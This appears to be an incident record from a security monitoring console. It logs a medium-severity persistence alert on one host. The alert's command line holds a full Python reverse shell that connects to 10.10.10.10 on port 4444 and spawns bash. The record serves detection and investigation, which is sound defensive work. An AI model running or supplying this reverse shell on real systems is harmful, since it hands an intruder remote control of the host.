Back to list

Medium CINC-20251220-4F65F0FE new

Aggregate ID: aggind:b4aeee57c4b841bc95cb853f0aca95e1:4780404635

Incident Overview

Incident ID CINC-20251220-4F65F0FE
Severity Medium (70)
Status new
Alert Count 1
Host Count 1

Timeline

First Seen 2025-12-20 09:20:21
Last Seen 2025-12-20 09:20:21
Duration 0d 0h 0m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Persistence
Techniques:
External Remote Services

Affected Hosts (1)

localhost.localdomain

Related Alerts (1)

Severity Status Hostname Description Tactic Command Line Time
High new localhost.localdomain The activity appears to be related to an adversary establishing persistence. The host may already be compromised and the activity should be investigated further to find the source. Persistence bash -c python3 -c 'import pty,socket,os;s=socket.socket();s.connect(("10.10.10.10",4444));pty.spawn("/bin/bash")' 12-20 09:20